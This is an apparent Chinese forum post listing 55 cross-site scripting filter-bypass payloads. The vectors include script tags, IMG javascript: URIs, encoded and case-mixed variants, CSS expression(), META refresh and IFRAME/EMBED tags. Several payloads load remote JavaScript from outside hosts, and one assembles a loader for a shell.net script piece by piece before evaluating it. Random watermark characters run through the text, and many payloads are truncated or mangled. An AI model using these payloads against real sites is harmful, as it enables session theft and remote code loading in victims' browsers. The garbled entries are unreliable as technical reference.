(1)普通的XSS JavaScript注入# i# H/ d5 P9 z9 t3 [9 s
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
$ o$ y! C) ^, M' _ O0 ?& [(99)另类弹框7 B" L4 j+ P$ G# \* o* N$ U
<q/oncut=alert()>1( P ~" F( i& I7 ? a1 V
<s/onclick=alert()>b! Y7 m3 t! b: a6 A! ]
<XSS=" onclick="alert(1)//">clickme</SSX=">& o5 X- ]$ @( z$ {
<zzz onclick=alert`1`>clickme</zzz> + l1 }8 s/ k0 W$ o4 I& T3 D' a
<a onclick=alert`1`>clickme</a>
" s' @4 u, @2 y. M# h& h4 a<a=">clickme</a=">
' s9 v0 ^6 M& i" y2 C<a=">clickme</a>$ \* h( @, \+ A- V- m- v Y& F
<z=">clickme</z=">
2 K1 T. h0 K2 h/ n1 u<z onclick=alert`1`>clickme</z>9 G, _; H$ B/ W" P: D- G. @: d$ N
, b4 H# H( W( x2 W8 i. ?(2)IMG标签XSS使用JavaScript命令3 R* J: O% w l. {+ B8 A
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" ~: @2 F. ?; ~, w5 X$ u- s
/ `% U. j5 a% \; X(3)IMG标签无分号无引号: i9 R" t% [) k- o
<IMG SRC=javascript:alert(‘XSS’)>
' R# E& O- ]" M* N( g7 ]- B' C$ R3 X- O
(4)IMG标签大小写不敏感: d$ f. g+ q) x. {0 E+ B" i
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>) B5 {2 p# g+ h- o: [2 @, [4 S
7 i$ m9 ^. H) t+ [2 O(5)HTML编码(必须有分号)* o% o/ N" _: F r3 ~, G5 U
<IMG SRC=javascript:alert(“XSS”)>: |) Y! G2 X+ W
( ^. x" v1 U% B3 x/ n) ~$ n
(6)修正缺陷IMG标签1 c8 M% U( M8 m& j* i& l
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
0 H6 V% t! ^* e6 p; _8 o* A. D5 v8 h) k) j* R5 Y
(7)formCharCode标签(计算器)
2 Q- N D) [( Y- }0 O7 [1 O+ J<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))># s& \2 a: H$ X3 V' Y
9 A0 n! H( B5 T8 w, f
(8)UTF-8的Unicode编码(计算器) d) T0 Y9 a. e: X
<IMG SRC=jav..省略..S')># X- T/ \9 F. k1 @4 {+ \' V: K+ J
" s% t$ {. c/ _(9)7位的UTF-8的Unicode编码是没有分号的(计算器)* R3 h% B+ g; `! v# a
<IMG SRC=jav..省略..S')>, b g" W2 v) \5 t& U
$ W: R0 G& E+ A, { L: g' U(10)十六进制编码也是没有分号(计算器)
; _ t) F# q/ q7 D<IMG SRC=\'#\'" /span>
/ A. c- d) n. q( A! z8 f
0 `( l& N* `# G3 h/ G3 Z" N! {- h(11)嵌入式标签,将Javascript分开
% ?5 }3 G6 n9 T. m3 i! I. W2 \<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
6 B! C) v4 n1 j2 d9 Z6 i' N% y! v4 F" G' `" z
(12)嵌入式编码标签,将Javascript分开
! f6 P7 {# K/ |! c<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
- `3 D% b9 Z$ H
8 ~. A' r& ?1 T2 y% k1 Y(13)嵌入式换行符1 h# o) h* J" S0 n4 G4 L
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>: v0 E1 q$ j$ I, a0 S9 i0 ?
, t" b' \" c, {& R- h
(14)嵌入式回车
$ P& G% z1 d( F' B% D$ x- e2 V<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
3 V6 [/ q" c* c6 K: i t# v
4 Q; K! N. G( D/ z) r2 F& z7 V(15)嵌入式多行注入JavaScript,这是XSS极端的例子' p; J6 K8 p% T2 v) d9 {/ k. W
<IMG SRC=\'#\'" /span>8 @ \! c r& w) h5 ~) x3 U# }( Z/ p
* H u* g' X. E$ l% ^% j% Q8 F8 r
(16)解决限制字符(要求同页面)4 @" R1 X- @% j8 U
<script>z=’document.’</script>
; ~& O c9 y! i2 f+ T<script>z=z+’write(“‘</script># i3 C- c m. D' m5 M+ S3 H; A% U
<script>z=z+’<script’</script>
5 N) b! n6 L) H9 I8 j! D/ z<script>z=z+’ src=ht’</script>3 C. b6 h* v4 v7 B2 j
<script>z=z+’tp://ww’</script>! u% T3 h0 W8 F! }) [: w
<script>z=z+’w.shell’</script>. i4 r' y. a7 m; \! k, t9 H# q
<script>z=z+’.net/1.’</script>
' x, }# u$ {, T: q3 ]& i0 X0 b<script>z=z+’js></sc’</script>5 v7 Y$ s; x. Q% w0 Q% D' G* G
<script>z=z+’ript>”)’</script>8 V% }0 L8 K0 V! S3 ^ i: T
<script>eval_r(z)</script>
. r" d7 Q9 B. J+ O, f8 y1 b
, L' y$ W& \, f6 o(17)空字符
* m1 g* W, j2 E8 t8 cperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out. _/ C" h" @! X! v7 e' p
& s1 h$ A( N) |" N
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用: ?4 [7 j7 R8 T; M. b1 Y
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
1 l* z7 |2 A) a1 T$ D4 q! h0 \- w, v, F/ ]% d1 n- }
(19)Spaces和meta前的IMG标签7 R: o- B# Q0 ^9 F
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
* D K D- I5 W, K5 S: u3 D0 E
. q* Y, V* Z$ F0 ](20)Non-alpha-non-digit XSS
2 i. h5 _6 f5 W- \<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
2 q' I) y1 l7 W- I/ A$ {& h( Y/ h; R: ^" E o9 `
(21)Non-alpha-non-digit XSS to 2
- a* \) [ t1 z1 g# U$ t8 J<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
; A v" c- e/ a: s7 L c
9 g3 R! l7 D7 ^% S7 N(22)Non-alpha-non-digit XSS to 3
! u9 n* r7 n. c5 { U% ^<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>- F6 k$ e( Z; e6 W
% c, s( e4 ^+ H/ Y& a
(23)双开括号
5 H1 E: N0 T/ k. k' N- m7 S) s<<SCRIPT>alert(“XSS”);//<</SCRIPT>
" [) h: V) j) S9 T& E. D: `! s) C8 M+ l7 m% c
(24)无结束脚本标记(仅火狐等浏览器), q* W, v7 i' u7 n3 K
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
+ s) p) r* `6 y2 T
7 ~% W/ A. d: G8 q: O' V7 X(25)无结束脚本标记2; d9 Q: H% N I3 y6 z+ f
<SCRIPT SRC=//3w.org/XSS/xss.js>5 V0 P: w( I2 w: u" m. v$ Z
1 A( O) a/ g ^(26)半开的HTML/JavaScript XSS
; B/ W2 c9 w( A6 }2 ^& j7 [5 H<IMG SRC=\'#\'" /span>
" a" A, H6 v d
; A$ T y8 n: u% P(27)双开角括号/ C8 U3 N8 M% n& ^
<iframe src=http://3w.org/XSS.html <
2 M" k. L9 w) |0 y: k/ m+ T3 d$ h% k7 I
(28)无单引号 双引号 分号" v! r* o( z. t; S$ ~/ T" L
<SCRIPT>a=/XSS/3 T- o) O9 y T. P' L w
alert(a.source)</SCRIPT>, z5 W( r' l- _- p4 ?3 z7 [- @
5 u3 U8 P$ R8 ?( Q' ~$ _
(29)换码过滤的JavaScript
7 p% Q' x) \6 m; k$ b" O" V\”;alert(‘XSS’);//( Y: [7 ~" G+ S! S- d
& m# O1 }. i& d0 A% I. V. f(30)结束Title标签: X' t6 g: B. k
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>3 Q+ h- Q% c7 O; }! o1 J' ~8 U
5 Q; F* c" {& B0 N% Z' T! E
(31)Input Image
9 Y( Z5 ]# R d; Q$ K m N<INPUT SRC=\'#\'" /span>
* G6 o) \/ w& l) m0 i
/ c# T$ e# |' t(32)BODY Image C* d6 v6 v8 b4 B9 j
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>- ^% w% v6 ?( i ^
# z8 e' ]: h& q. g* b(33)BODY标签
/ y b- }& V9 o<BODY(‘XSS’)>
$ X2 _( |3 Q+ N/ P# a& m
3 r" F: s" ~3 b: ^ m: V(34)IMG Dynsrc1 G8 |' E2 t; h5 A( B0 h$ x& ~
<IMG DYNSRC=\'#\'" /span>
9 S* |# ]( r1 D% t; r$ h
' {$ d5 ]( }3 q1 m$ |1 G5 {+ N(35)IMG Lowsrc4 Q+ y- |3 y7 W6 I8 A
<IMG LOWSRC=\'#\'" /span>
5 k$ U, [% w S! q9 s, t1 P3 K
& g! c4 h" ~( S(36)BGSOUND2 h/ R' D! `' Q5 T
<BGSOUND SRC=\'#\'" /span>- c: A1 P. r0 T- t
2 r6 B% r* Z, m
(37)STYLE sheet m/ ]& P, W c" b0 ^ f( ?1 O
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>7 T$ b* X+ [ E7 a- k& j, i
( b# {3 R }+ z- i
(38)远程样式表
! h* }/ s. W2 C4 a% ?# ]! @3 ~<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>7 v) I1 l# V( i9 x! X( _
2 R1 K/ @1 \% l: g, c4 D! }* E
(39)List-style-image(列表式)
" A# P: _ u0 o) Y' B k5 o<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
1 A2 f* p. _: ]' l, b: c# G% ]" ]- n# |3 w1 d8 W1 d
(40)IMG VBscript
( u" l, P" c; r% {) @% F<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
: O9 @: T C" B* ^8 j
1 e5 ^7 w7 v8 z# k8 r(41)META链接url
5 [& \- I) s3 @) Q; a<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
2 M- t8 g5 P- L" j! d( T. R! u' R3 w6 B+ g
(42)Iframe/ `1 s1 p: U4 ^5 y
<IFRAME SRC=\'#\'" /IFRAME>
3 W; ]/ V: D( z# I& W
/ A$ o+ q1 W C( Y/ V(43)Frame1 e2 g+ M/ R. U& Q3 e- F4 n+ c
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
$ W q2 }. N9 @; U+ G/ M' ^8 R# i+ E4 t3 \8 i/ x9 }
(44)Table
$ e+ i; A4 u" O' i, n<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>5 y! ` {2 \2 f/ t" e0 N
- Q9 f- c4 C3 y(45)TD
+ i" ~6 K( Q8 R: D3 D<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>! Y0 T- S6 O1 ?! _! [9 I/ W% L
J- k t/ M. v; B8 w
(46)DIV background-image! q. M9 ^7 X* ]; k8 U. V: r
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
+ s; K" N+ X) ?9 ~" w( e5 ^( J# W6 Q7 d* C& P
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279). B6 f5 ~$ `2 ]- I' B5 q/ K) z I
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>. r) C9 t' x/ D% @' {% X0 E
' X* A0 X, i8 i# G" d(48)DIV expression7 |! L, W! M, q! V4 c7 k
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
) l) B, l/ f H$ \% p
0 G7 v. q8 i9 \5 d' L7 l(49)STYLE属性分拆表达) o7 Z( e& g9 A! z
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>: Z. m% {% M) I: y3 c
% q; G0 l' i4 l, Q7 V
(50)匿名STYLE(组成:开角号和一个字母开头)2 t5 j9 x# @% w+ i3 C4 ^% j8 c$ p
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
9 J# i: _( q: ~5 J/ V3 h- z. g, b N: p
(51)STYLE background-image' k8 f9 v+ v1 w; x7 t( ^2 p% L; ^
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>, _, b5 z; `" \6 k6 z' l- O4 e( H
2 n; `$ t& d1 E( r A1 ?(52)IMG STYLE方式
3 D' J- ^. o3 R0 Hexppression(alert(“XSS”))’>7 ]5 A! K0 t6 [0 x
$ `- R$ t5 Q/ Q; v
(53)STYLE background6 b" z* j) C" o L: V7 O7 ?
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
3 ~, a' R- j+ ^% t9 Z% `! U6 ]: V+ u; }
(54)BASE) F+ q! L1 P: P$ ]' }' Y$ V+ U
<BASE HREF=”javascript:alert(‘XSS’);//”>
' P2 e' ^4 F* O( \, k2 S% u
$ @- _0 F: J# D' G4 a(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
! {& f( A b" M. T- d<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>2 `9 f4 ~' e" B6 R: Z
|
发表于 2016-4-28 10:06:15
收藏
支持
反对